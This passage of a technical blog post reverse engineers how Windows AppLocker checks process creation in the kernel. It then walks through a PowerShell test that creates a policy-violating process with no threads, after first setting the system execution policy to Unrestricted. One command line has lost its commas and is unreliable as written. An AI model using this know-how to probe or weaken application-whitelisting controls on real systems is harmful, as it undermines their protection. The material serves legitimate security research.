    With that out of the way, we now get on to the meat of the checking process. First the code opens a handle to the main executable's file object. Access to the file will be needed if the rules such as hash or publisher certificate are used. It'll open the file even if those rules are being used, just in case. Next a call is made to AiSetAttributesExe which takes the access token handles, the policy and the file handle. This must do something magical, but being the tease I am we'll leave this for now.  Finally in this section a call is made to SrppAccessCheck which as its name suggests is doing the access check again the policy for whether this process is allowed to be created. Note that only the access check token is passed, not the process token.

    The use of an access check, verifying a Security Descriptor against an Access Token makes perfect sense when you think of how rules are structured. The allow and deny rules correspond well to allow or deny ACEs for specific group SIDs. How the rule specification such as path restrictions are enforced is less clear but we'll leave the details of this for next time.

    The result of the access check is the status code returned from AipCreateProcessNotifyRoutine which ends up being set to the CreationStatus field in the notification structure which can terminate the process. We can assume that this result will either be a success or an error code such as STATUS_ACCESS_DISABLED_BY_POLICY_OTHER. 

    One final step is necessary, logging an event if the access check failed. If the result of the access check is an error, but the policy is currently configured in Audit Only mode, i.e. not enforcing AL process creation then the log entry will be made but the status code is reset back to a success so that the kernel will not terminate the process.

    Testing System Behavior

    Before we go let's test the behavior that we can create a process which is against the configured policy, as long as there's no threads in it. This is probably not a useful behavior but it's always good to try and verify your assumptions about reverse engineered code.

    To do the test we'll need to install my NtObjectManager PowerShell module. We'll use the module more going forward so might as well install it now. To do that follow this procedure on the VM we setup last time:
    1. In an administrator PowerShell console, run the command 'Install-Module NtObjectManager'. Running this command as an admin allows the module to be installed in Program Files which is one of the permitted locations for Everyone in part 1's sample rules.
    2. Set the system execution policy to unrestricted from the same PowerShell window using the command 'Set-ExecutionPolicy -ExecutionPolicy Unrestricted'. This allows unsigned scripts to run for all users.
    3. Log in as the non-admin user, otherwise nothing will be enforced.
    4. Start a PowerShell console and ensure you can load the NtObjectManager module by running 'Import-Module NtObjectManager'. You shouldn't see any errors.
    From part 1 you should already have an executable in the Desktop folder which if you run it it'll be blocked by policy (if not copy something else to the desktop, say a copy of NOTEPAD.EXE).

    Now run the following three commands in the PowerShell windows. You might need to adjust the executable path as appropriate for the file you copied (and don't forget the \?? prefix).

    $path = "\??\C:\Users\$env:USERNAME\Desktop\notepad.exe"
    $sect = New-NtSectionImage -Path $path
    $p = [NtApiDotNet.NtProcess]::CreateProcessEx($sect)
    Get-NtStatus $p.ExitStatus

    After the call to Get-NtStatus it should print that the current exit code for the process is STATUS_PENDING. This is an indication that the process is alive, although at the moment we don't have any code running in it. Now create a new thread in the process using the following:

    [NtApiDotNet.NtThread]::Create($p00"Suspended"4096)
    Get-NtStatus $p.ExitStatus

    After calling NtThread::Create you should receive an big red exception error and the call to Get-NtStatus should now show that the process returned error. To make it more clear I've reproduced the example in the following screenshot:

    Screenshot of PowerShell showing the process creation and error when a thread is added.

    That's all for this post. Of course there's still a few big mysteries to solve, why does AiGetTokens return two token handles, what is AiSetAttributesExe doing and how does SrppAccessCheck verify the policy through an access check? Find out next time.


    ❌
    ❌